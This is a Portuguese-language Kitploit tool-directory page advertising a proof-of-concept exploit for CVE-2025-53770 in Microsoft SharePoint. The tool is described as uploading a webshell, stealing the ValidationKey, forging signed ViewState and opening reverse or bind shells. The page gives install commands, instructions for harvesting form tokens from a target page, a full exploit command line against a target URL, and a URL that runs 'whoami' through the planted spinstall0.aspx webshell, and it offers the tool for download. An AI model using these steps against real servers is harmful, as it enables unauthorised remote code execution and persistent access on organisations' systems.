Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Toolshell_CVE-2025-53770 — Exploit PoC para CVE-2025-53770 que permite upload de webshell no SharePoint, extração de ValidationKey, geração de ViewState assinado e execução remota de código via shell reverso ou bind shell. | Kitploit
Ferramentas/GitHubGitHub/greenforcenetworks/toolshell_cve-2025-53770
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHubgreenforcenetworks/toolshell_cve-2025-53770

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Toolshell_CVE-2025-53770

Exploit PoC para CVE-2025-53770 que permite upload de webshell no SharePoint, extração de ValidationKey, geração de ViewState assinado e execução remota de código via shell reverso ou bind shell.

Ver Repositório
há 1 anoAinda não revisado

ToolShell → CVE‑2025‑53770 Exploit PoC

Este pacote permite:

  1. Enviar webshell para o SharePoint
  2. Extrair ValidationKey
  3. Gerar ViewState assinado
  4. RCE via shell reverso/vinculado

🔧 Configuração

root@kitploit:~
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt

🤖 Executando

Envie a webshell

A partir de uma página do SharePoint, você pode acessar o código-fonte da página. Basta ir na guia de visualização de código-fonte e, se disponível, você obterá o seguinte, que pode ser copiado:

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (qualquer __VIEWSTATE atual para contexto)

root@kitploit:~

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"

Isso envia spinstall0.aspx. Verifique: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami

Baixar ferramenta